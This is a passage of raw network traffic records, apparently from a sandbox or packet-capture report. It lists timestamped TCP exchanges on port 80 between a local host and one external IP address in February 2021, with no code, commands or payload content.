                                          Feb 22, 2021 19:13:39.023277998 CET8049781203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:39.023402929 CET4978180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:39.357800007 CET8049781203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:39.392492056 CET8049781203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:39.392525911 CET8049781203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:39.392606974 CET4978180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:39.392674923 CET4978180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:39.640938997 CET4978480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:39.727544069 CET8049781203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:39.975528955 CET8049784203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:39.975697994 CET4978480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:39.984081984 CET4978480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:40.320708036 CET8049784203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:40.320997953 CET4978480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:40.655272007 CET8049784203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:40.691271067 CET8049784203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:40.691379070 CET4978480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:40.691643953 CET8049784203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:40.691735983 CET4978480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:40.959562063 CET4978880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:41.025378942 CET8049784203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:41.297840118 CET8049788203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:41.297950029 CET4978880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:41.300879002 CET4978880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:41.637674093 CET8049788203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:41.637780905 CET4978880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:41.975538015 CET8049788203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:42.004107952 CET8049788203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:42.004211903 CET8049788203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:42.004328012 CET4978880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:42.005177021 CET4978880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:42.243577957 CET4979080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:42.341739893 CET8049788203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:42.581017971 CET8049790203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:42.581176043 CET4979080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:42.586766958 CET4979080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:42.921617985 CET8049790203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:42.921735048 CET4979080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:43.256527901 CET8049790203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:43.288108110 CET8049790203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:43.288283110 CET4979080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:43.288481951 CET8049790203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:43.292408943 CET4979080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:43.534276962 CET4979280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:43.622981071 CET8049790203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:43.869123936 CET8049792203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:43.869232893 CET4979280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:43.872009993 CET4979280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:44.207695007 CET8049792203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:44.207918882 CET4979280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:44.542459965 CET8049792203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:44.576299906 CET8049792203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:44.576551914 CET8049792203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:44.576628923 CET4979280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:44.578947067 CET4979280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:44.796436071 CET4979380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:44.917512894 CET8049792203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:45.131869078 CET8049793203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:45.132352114 CET4979380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:45.134991884 CET4979380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:45.470438957 CET8049793203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:45.470527887 CET4979380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:45.805701971 CET8049793203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:45.838083982 CET8049793203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:45.838129044 CET8049793203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:45.841618061 CET4979380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:45.841656923 CET4979380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:46.097471952 CET4979480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:46.177248001 CET8049793203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:46.444108963 CET8049794203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:46.445601940 CET4979480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:46.448703051 CET4979480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:46.794996977 CET8049794203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:46.795232058 CET4979480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:47.141275883 CET8049794203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:47.172113895 CET8049794203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:47.172290087 CET8049794203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:47.172524929 CET4979480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:47.176336050 CET4979480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:47.420962095 CET4979580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:47.522226095 CET8049794203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:47.758186102 CET8049795203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:47.758353949 CET4979580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:47.761298895 CET4979580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:48.098963022 CET8049795203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:48.099041939 CET4979580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:48.436330080 CET8049795203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:48.467871904 CET8049795203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:48.467916012 CET8049795203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:48.467976093 CET4979580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:48.468036890 CET4979580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:48.704180956 CET4979680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:48.805315018 CET8049795203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:49.038976908 CET8049796203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:49.040853024 CET4979680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:49.047257900 CET4979680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:49.382189035 CET8049796203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:49.382508039 CET4979680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:49.717134953 CET8049796203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:49.748456955 CET8049796203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:49.748485088 CET8049796203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:49.748615026 CET4979680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:49.748718023 CET4979680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:49.978683949 CET4979780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:50.086057901 CET8049796203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:50.319796085 CET8049797203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:50.320014000 CET4979780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:50.324886084 CET4979780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:50.663242102 CET8049797203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:50.663357019 CET4979780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:51.001254082 CET8049797203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:51.031461954 CET8049797203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:51.031606913 CET4979780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:51.031799078 CET8049797203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:51.031879902 CET4979780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:51.276801109 CET4979880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:51.369652987 CET8049797203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:51.615041971 CET8049798203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:51.615284920 CET4979880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:51.622675896 CET4979880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:51.960963011 CET8049798203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:51.961210966 CET4979880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:52.299410105 CET8049798203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:52.330063105 CET8049798203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:52.330363035 CET8049798203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:52.330385923 CET4979880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:52.330465078 CET4979880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:52.589252949 CET4979980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:52.671586990 CET8049798203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:52.923830986 CET8049799203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:52.923995972 CET4979980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:52.940188885 CET4979980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:53.276544094 CET8049799203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:53.276652098 CET4979980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:53.613017082 CET8049799203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:53.654052973 CET8049799203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:53.654226065 CET4979980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:53.654251099 CET8049799203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:53.654333115 CET4979980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:53.876693964 CET4980080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:53.988482952 CET8049799203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:54.211711884 CET8049800203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:54.213130951 CET4980080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:54.217315912 CET4980080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:54.553634882 CET8049800203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:54.554219961 CET4980080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:54.888840914 CET8049800203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:54.922338009 CET8049800203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:54.922454119 CET4980080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:54.922511101 CET8049800203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:54.922568083 CET4980080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:55.156162977 CET4980480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:55.257162094 CET8049800203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:55.490911007 CET8049804203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:55.491027117 CET4980480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:55.493777990 CET4980480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:55.828674078 CET8049804203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:55.828850985 CET4980480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:56.163475990 CET8049804203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:56.195640087 CET8049804203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:56.195713043 CET8049804203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:56.195776939 CET4980480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:56.197033882 CET4980480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:56.424488068 CET4980580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:56.530540943 CET8049804203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:56.760215998 CET8049805203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:56.760335922 CET4980580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:56.763031960 CET4980580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:57.097064972 CET8049805203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:57.098416090 CET4980580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:57.434627056 CET8049805203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:57.467051029 CET8049805203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:57.467173100 CET4980580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:57.467500925 CET8049805203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:57.467590094 CET4980580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:57.708933115 CET4981180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:57.800723076 CET8049805203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:58.047174931 CET8049811203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:58.047283888 CET4981180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:58.050741911 CET4981180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:58.390463114 CET8049811203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:58.390557051 CET4981180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:58.728013039 CET8049811203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:58.757900953 CET8049811203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:58.758189917 CET4981180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:58.758214951 CET8049811203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:58.758529902 CET4981180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:58.976737976 CET4981280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:59.097623110 CET8049811203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:59.317632914 CET8049812203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:59.318540096 CET4981280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:59.321820021 CET4981280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:59.664855957 CET8049812203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:59.665541887 CET4981280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:00.002942085 CET8049812203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:00.041541100 CET8049812203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:00.041593075 CET8049812203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:00.041712999 CET4981280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:00.041747093 CET4981280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:00.291079044 CET4981380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:00.379120111 CET8049812203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:00.625814915 CET8049813203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:00.629396915 CET4981380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:00.631942034 CET4981380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:00.968427896 CET8049813203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:00.970818996 CET4981380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:01.304662943 CET8049813203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:01.344598055 CET8049813203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:01.344877958 CET8049813203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:01.344877958 CET4981380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:01.344947100 CET4981380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:01.581593990 CET4981480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:01.680428982 CET8049813203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:01.917135000 CET8049814203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:01.917305946 CET4981480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:01.922836065 CET4981480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:02.257256031 CET8049814203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:02.257450104 CET4981480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:02.591464996 CET8049814203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:02.623399973 CET8049814203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:02.623450041 CET8049814203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:02.623632908 CET4981480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:02.623656988 CET4981480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:02.890727043 CET4981580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:02.957371950 CET8049814203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:03.226814985 CET8049815203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:03.227049112 CET4981580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:03.230295897 CET4981580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:03.564932108 CET8049815203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:03.565103054 CET4981580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:03.899715900 CET8049815203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:03.928021908 CET8049815203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:03.928194046 CET4981580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:03.928421021 CET8049815203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:03.928491116 CET4981580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:04.166305065 CET4981680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:04.262698889 CET8049815203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:04.503792048 CET8049816203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:04.505326986 CET4981680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:04.508068085 CET4981680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:04.845519066 CET8049816203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:04.845724106 CET4981680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:05.182857990 CET8049816203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:05.223133087 CET8049816203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:05.223248959 CET4981680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:05.223402023 CET8049816203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:05.223470926 CET4981680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:05.470774889 CET4981780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:05.562098026 CET8049816203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:05.808561087 CET8049817203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:05.808903933 CET4981780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:05.814223051 CET4981780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:06.153723955 CET8049817203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:06.153937101 CET4981780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:06.492265940 CET8049817203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:06.530955076 CET8049817203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:06.531183004 CET8049817203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:06.531367064 CET4981780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:06.531400919 CET4981780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:06.771215916 CET4981880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:06.869174957 CET8049817203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:07.109533072 CET8049818203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:07.109680891 CET4981880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:07.112781048 CET4981880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:07.451200008 CET8049818203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:07.451307058 CET4981880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:07.789136887 CET8049818203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:07.826639891 CET8049818203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:07.826808929 CET4981880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:07.826984882 CET8049818203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:07.827045918 CET4981880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:08.072906971 CET4981980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:08.166235924 CET8049818203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:08.410173893 CET8049819203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:08.410295963 CET4981980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:08.413652897 CET4981980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:08.749349117 CET8049819203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:08.749602079 CET4981980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:09.085068941 CET8049819203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:09.114203930 CET8049819203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:09.114279032 CET8049819203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:09.114362955 CET4981980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:09.114414930 CET4981980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:09.355540037 CET4982080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:09.448856115 CET8049819203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:09.693408012 CET8049820203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:09.693557024 CET4982080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:09.712193966 CET4982080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:10.049879074 CET8049820203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:10.049978971 CET4982080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:10.391522884 CET8049820203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:10.421947002 CET8049820203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:10.422000885 CET8049820203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:10.422168016 CET4982080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:10.422214031 CET4982080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:10.639776945 CET4982180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:10.761104107 CET8049820203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:10.975539923 CET8049821203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:10.975754976 CET4982180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:11.002002954 CET4982180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:11.337661028 CET8049821203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:11.337898016 CET4982180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:11.674774885 CET8049821203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:11.707024097 CET8049821203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:11.707323074 CET8049821203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:11.707391024 CET4982180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:11.707425117 CET4982180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:11.959961891 CET4982280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:12.042572975 CET8049821203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:12.298293114 CET8049822203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:12.298474073 CET4982280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:12.313270092 CET4982280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:12.653194904 CET8049822203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:12.653307915 CET4982280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:12.993556976 CET8049822203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:13.023763895 CET8049822203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:13.023874044 CET8049822203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:13.023891926 CET4982280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:13.023925066 CET4982280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:13.249608994 CET4982380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:13.361994028 CET8049822203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:13.584155083 CET8049823203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:13.584359884 CET4982380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:13.908883095 CET4982380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:14.244668007 CET8049823203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:14.247961044 CET4982380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:14.582493067 CET8049823203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:14.616005898 CET8049823203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:14.616067886 CET8049823203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:14.616245985 CET4982380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:14.769469023 CET4982380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:15.081182003 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:15.105243921 CET8049823203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:15.417537928 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:15.417752028 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:15.437535048 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:15.773372889 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:15.773653984 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.108849049 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.140294075 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.140433073 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.140557051 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.140607119 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.346271992 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.476020098 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.683573008 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.683917999 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.710648060 CET4982580192.168.2.4203.170.84.89
